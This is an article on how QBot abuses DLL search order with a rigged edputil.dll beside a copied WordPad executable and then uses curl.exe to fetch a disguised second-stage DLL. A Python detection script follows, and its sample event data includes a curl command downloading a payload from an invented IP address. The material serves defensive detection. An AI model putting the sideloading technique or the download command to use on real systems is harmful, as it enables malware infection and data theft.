The QBot malware exploits a WordPad-related weakness to infect Windows machines. The malicious code runs once a manipulated DLL file is loaded. As usual, the software is distributed via spam email attachments.
Many Windows applications use DLL libraries, which make functions available across programs. These files are loaded when the application starts. Windows, however, looks for a DLL in the application's own folder before searching the system folders. WordPad requires “edputil.dll”, which is stored in the System32 directory.
According to Bleeping Computer, QBot operators are currently sending ZIP files containing a “document.exe” and an “edputil.dll”. The executable is a copy of the legitimate WordPad application “write.exe”. The DLL, however, is rigged: because it sits in the same folder as the executable, it is loaded when the tool starts instead of the legitimate library in the system directory.
QBot picks up mail addresses and data
Once the library is loaded, the system application “curl.exe” is called to download another DLL disguised as a PNG image. That file is then executed, leaving QBot running in the background. The malware harvests email addresses for further phishing attacks and can install further toolkits on the PC. Attackers can use the infected PC to take over other devices on the network, intercept data or launch a ransomware attack.
By installing via WordPad, the attackers hope that antivirus apps will not detect the malicious code and warn the user. Since downloading the actual malware requires “curl.exe”, older computers are not affected: the tool ships only with Windows 10 and 11.
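The two-stage chain described above (a System32-resident DLL name loaded from the executable's own folder, followed by curl.exe spawned from that process) can be spotted in endpoint telemetry. The following is an added example written for this page, not code from the article or from any vendor: it runs two correlation rules over constructed Sysmon-style ImageLoad (ID 7) and ProcessCreate (ID 1) events; the paths, PIDs and the 203.0.113.5 address are invented.

```python
import ntpath

# Constructed sample events (not real telemetry). Field names mirror Sysmon's
# ImageLoaded / ParentProcessId / CommandLine fields; all values are invented.
EVENTS = [
    {"id": 7, "pid": 4120, "image": r"C:\Users\bob\Downloads\document.exe",
     "loaded": r"C:\Users\bob\Downloads\edputil.dll"},
    {"id": 1, "pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\bob\AppData\Local\Temp\x.png http://203.0.113.5/x.png"},
    # Legitimate WordPad loading the real edputil.dll from System32: must not alert.
    {"id": 7, "pid": 3001, "image": r"C:\Program Files\Windows NT\Accessories\wordpad.exe",
     "loaded": r"C:\Windows\System32\edputil.dll"},
]

# Directories where the genuine copy of a system DLL is expected to live.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLL names that should only ever be loaded from a system directory; the
# article names edputil.dll, extend this set with others you care about.
SYSTEM_DLLS = {"edputil.dll"}


def is_system_path(path):
    """True if the DLL sits in one of the expected Windows system directories."""
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def detect(events):
    """Return alert strings for the QBot-style chain.

    Rule 1: a DLL whose name belongs in System32 is loaded from somewhere else
            (search-order hijack via the application folder).
    Rule 2: curl.exe is spawned by a process already flagged by rule 1
            (the follow-on download of the payload disguised as a PNG).
    """
    alerts, hijacked_pids = [], set()
    for e in events:
        if e["id"] == 7:
            name = ntpath.basename(e["loaded"]).lower()
            if name in SYSTEM_DLLS and not is_system_path(e["loaded"]):
                hijacked_pids.add(e["pid"])
                alerts.append(f"sideload: pid {e['pid']} {e['image']} loaded {e['loaded']}")
        elif e["id"] == 1:
            child = ntpath.basename(e["image"]).lower()
            if child == "curl.exe" and e.get("ppid") in hijacked_pids:
                alerts.append(f"download: pid {e['pid']} curl.exe spawned by hijacked pid {e['ppid']}")
    return alerts


if __name__ == "__main__":
    for line in detect(EVENTS):
        print(line)
```

Rule 1 alone already catches the staging described in the article; rule 2 is the correlation that lifts it from "suspicious" to "active infection chain" without relying on the payload's file name.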